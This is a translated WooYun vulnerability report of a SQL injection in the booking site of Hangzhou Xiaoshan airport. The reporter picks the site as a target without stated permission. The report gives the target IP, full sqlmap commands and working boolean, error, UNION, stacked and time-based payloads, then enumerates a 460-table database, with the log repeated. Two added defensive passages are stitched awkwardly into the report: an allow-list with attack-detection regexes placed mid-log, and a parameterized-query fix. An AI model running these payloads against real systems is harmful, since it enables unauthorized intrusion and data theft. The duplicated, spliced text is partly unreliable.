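Vulnerability details
Disclosure status:
2015-02-03:	Details reported to the vendor; awaiting vendor handling
2015-02-06:	Vendor confirmed; details disclosed to the vendor only
2015-02-16:	Details disclosed to core white hats and experts in related fields
2015-02-26:	Details disclosed to regular white hats
2015-03-08:	Details disclosed to trainee white hats
2015-03-20:	Details disclosed to the public

Brief description:
Airports have been in the news a lot lately, so I decided to take a shot at one.
Detailed description:
First, I settled on Hangzhou Xiaoshan International Airport as the target:
http://www.hzairport.com
Then I went to the ticket booking site:
http://jipiao.hzairport.com
After a round of testing I came up with nothing. Frustrated as I was, I went at it again on my snail-paced connection.
First I pinged jipiao.hzairport.com to get its IP.
Then I replaced the domain name with the IP, and something magical happened:
http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx
It has a POST injection.
payload:
__VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634
Then I went straight to sqlmap.
I picked one at random: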
Database: AirportTest                                                          
[460 tables]
[11:38:00] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/60.191.78.34'
[*] shutting down at 11:38:00
root@hughlvan:/# sqlmap -u "http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE2MzEzMzk3NjJkZA%3D%3D&btnEdit=%E6%8F%90%20%E4%BA%A4&__EVENTVALIDATION=%2FwEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634" 
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:24
[11:45:24] [INFO] resuming back-end DBMS 'microsoft sql server' 
[11:45:24] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: tbOrderID
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; IF(6687=6687) SELECT 6687 ELSE DROP FUNCTION sthL--
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' AND 3469=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (3469=3469) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113))) AND 'bngz'='bngz
    Type: UNION query
    Title: Generic UNION query (NULL) - 41 columns
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+CHAR(105)+CHAR(117)+CHAR(84)+CHAR(75)+CHAR(116)+CHAR(68)+CHAR(86)+CHAR(67)+CHAR(65)+CHAR(109)+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' WAITFOR DELAY '0:0:5'--
---
[11:45:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[11:45:25] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/60.191.78.34'
[*] shutting down at 11:45:25
root@hughlvan:/# sqlmap -u "http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE2MzEzMzk3NjJkZA%3D%3D&btnEdit=%E6%8F%90%20%E4%BA%A4&__EVENTVALIDATION=%2FwEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634" -D AirportTest --table
[*] starting at 11:46:25
[11:46:26] [INFO] resuming back-end DBMS 'microsoft sql server' 
[11:46:26] [INFO] testing connection to the target URL
[11:46:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[11:46:26] [INFO] fetching tables for database: AirportTest
[11:46:26] [INFO] the SQL query used returns 92 entries
Database: AirportTest                                                          
[460 tables]
The connection is too slow, so I did not go any deeper.
 
Proof of vulnerability:
http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx
A POST injection exists here
payload:
__VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634
Then I ran sqlmap against it directly
Picked one database at random
Database: AirportTest                                                          
[460 tables]
[11:38:00] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/60.191.78.34'
[*] shutting down at 11:38:00
root@hughlvan:/# sqlmap -u "http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE2MzEzMzk3NjJkZA%3D%3D&btnEdit=%E6%8F%90%20%E4%BA%A4&__EVENTVALIDATION=%2FwEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634" 
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:24
[11:45:24] [INFO] resuming back-end DBMS 'microsoft sql server' 
[11:45:24] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: tbOrderID
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; IF(6687=6687) SELECT 6687 ELSE DROP FUNCTION sthL--
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' AND 3469=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (3469=3469) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113))) AND 'bngz'='bngz
    Type: UNION query
    Title: Generic UNION query (NULL) - 41 columns
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+CHAR(105)+CHAR(117)+CHAR(84)+CHAR(75)+CHAR(116)+CHAR(68)+CHAR(86)+CHAR(67)+CHAR(65)+CHAR(109)+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' WAITFOR DELAY '0:0:5'--
---
[11:45:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[11:45:25] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/60.191.78.34'
[*] shutting down at 11:45:25
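An added defensive example (not part of the original report and not the site's code): a request-side check that accepts `tbOrderID` only when it is a plain number, as the legitimate value on this page is, and labels rejected values with the technique names from the sqlmap output above. The function names, the 12-digit bound and the sample bodies (shortened from the payloads in the report) are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote_plus, urlencode

# The report's legitimate value is a plain number (88952634).
# The 12-digit upper bound is an assumption, not taken from the page.
ORDER_ID = re.compile(r"[0-9]{1,12}")

# Labels follow the technique names in the sqlmap output above. They only
# enrich the alert; the decision to reject comes from the allow-list.
SIGNATURES = [
    ("boolean-based blind", re.compile(r";\s*IF\s*\(", re.I)),
    ("error-based", re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("stacked queries", re.compile(r";\s*[A-Za-z]")),
    ("time-based blind", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
]


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into (name, value) pairs."""
    pairs = []
    for chunk in body.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def inspect_body(body, param="tbOrderID"):
    """Return the allow/reject decision for one POST body."""
    values = [v for n, v in parse_form(body) if n == param]
    if len(values) != 1:
        # A missing or duplicated field is rejected outright, so a second
        # copy of the parameter cannot slip past the check.
        return {"allowed": False, "reason": "missing or repeated parameter",
                "techniques": []}
    value = values[0]
    # fullmatch() also rejects a trailing newline, which "$" would let through.
    if ORDER_ID.fullmatch(value):
        return {"allowed": True, "reason": "numeric order id", "techniques": []}
    techniques = [label for label, rx in SIGNATURES if rx.search(value)]
    return {"allowed": False, "reason": "not a numeric order id",
            "techniques": techniques}


def build_body(order_id):
    """Constructed request body using the field names shown in the report."""
    return urlencode([("__VIEWSTATE", "/wEPDwULLTE2MzEzMzk3NjJkZA=="),
                      ("tbOrderID", order_id)])


# Constructed samples: the benign value plus shortened forms of the five
# payload families that sqlmap reported for tbOrderID.
SAMPLES = [
    ("benign", "88952634"),
    ("boolean", "88952634'; IF(6687=6687) SELECT 6687 ELSE DROP FUNCTION sthL--"),
    ("error", "88952634' AND 3469=CONVERT(INT,(SELECT CHAR(113)+CHAR(49))) AND 'bngz'='bngz"),
    ("union", "88952634' UNION ALL SELECT NULL,NULL,NULL-- "),
    ("stacked", "88952634'; WAITFOR DELAY '0:0:5'--"),
    ("time", "88952634' WAITFOR DELAY '0:0:5'--"),
]


def triage(samples=SAMPLES):
    """Run every sample through the check and return {label: decision}."""
    return {label: inspect_body(build_body(value)) for label, value in samples}


if __name__ == "__main__":
    for label, decision in triage().items():
        verdict = "ALLOW" if decision["allowed"] else "BLOCK"
        print(f"{label:8} {verdict:5} {decision['reason']:30} {decision['techniques']}")
```

The allow-list is a compensating control at the edge; the fix in the application itself is to bind `tbOrderID` as a typed parameter instead of concatenating it into the SQL string.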
root@hughlvan:/# sqlmap -u "http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE2MzEzMzk3NjJkZA%3D%3D&btnEdit=%E6%8F%90%20%E4%BA%A4&__EVENTVALIDATION=%2FwEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634" -D AirportTest --table
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:46:25
[11:46:26] [INFO] resuming back-end DBMS 'microsoft sql server' 
[11:46:26] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: tbOrderID
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; IF(6687=6687) SELECT 6687 ELSE DROP FUNCTION sthL--
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' AND 3469=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (3469=3469) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113))) AND 'bngz'='bngz
    Type: UNION query
    Title: Generic UNION query (NULL) - 41 columns
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+CHAR(105)+CHAR(117)+CHAR(84)+CHAR(75)+CHAR(116)+CHAR(68)+CHAR(86)+CHAR(67)+CHAR(65)+CHAR(109)+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' WAITFOR DELAY '0:0:5'--
---
[11:46:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[11:46:26] [INFO] fetching tables for database: AirportTest
[11:46:26] [INFO] the SQL query used returns 92 entries
Database: AirportTest                                                          
[460 tables]
+-------------------------+
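The connection is too slow, so I won't dig any deeper.

Fix:
You know what to do.
Copyright notice: when reposting, please credit the source weird0@乌云 (WooYun)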
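The POST injection in `tbOrderID` reported above is closed by validating the field and binding it as a query parameter. This is an added example, not code from the affected site or the original report: Python with an in-memory SQLite database stands in for the ASP.NET handler, and the `orders` table, its columns and the function names are assumptions.

```python
import sqlite3


def make_db():
    # Constructed sample data; the real schema is not shown in the report.
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE orders (order_id INTEGER PRIMARY KEY, owner TEXT, status TEXT)"
    )
    db.executemany(
        "INSERT INTO orders VALUES (?, ?, ?)",
        [(1001, "alice", "paid"), (1002, "bob", "paid"), (1003, "bob", "refunded")],
    )
    return db


def lookup_vulnerable(db, tb_order_id):
    # Assumed 'before': the form field is concatenated into the SQL text,
    # so its content is parsed as SQL instead of being treated as a value.
    sql = "SELECT order_id, owner, status FROM orders WHERE order_id = " + tb_order_id
    return db.execute(sql).fetchall()


def lookup_hardened(db, tb_order_id):
    # 1. Allow-list validation: an order number is ASCII digits, bounded length.
    if not (tb_order_id.isascii() and tb_order_id.isdigit() and len(tb_order_id) <= 12):
        raise ValueError("invalid order id")
    # 2. Bound parameter: the value never becomes part of the SQL text.
    sql = "SELECT order_id, owner, status FROM orders WHERE order_id = ?"
    return db.execute(sql, (int(tb_order_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    crafted = "1001 OR 1=1"  # constructed input that changes the query's logic
    print("vulnerable:", lookup_vulnerable(db, crafted))  # every row comes back
    print("hardened:  ", lookup_hardened(db, "1001"))     # only the requested row
    try:
        lookup_hardened(db, crafted)
    except ValueError as exc:
        print("rejected:  ", exc)
```

In ASP.NET the same two steps map to `int.TryParse` on the posted field and a `SqlCommand` with `SqlParameter` values instead of a concatenated command string.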
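Vulnerability response
Vendor response:
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-02-06 15:20
Vendor reply:
CNVD has confirmed and reproduced the reported issue and has forwarded it through CNCERT to the Civil Aviation Administration's evaluation center, which will coordinate follow-up handling with the website's administrators.
Latest status:
None yet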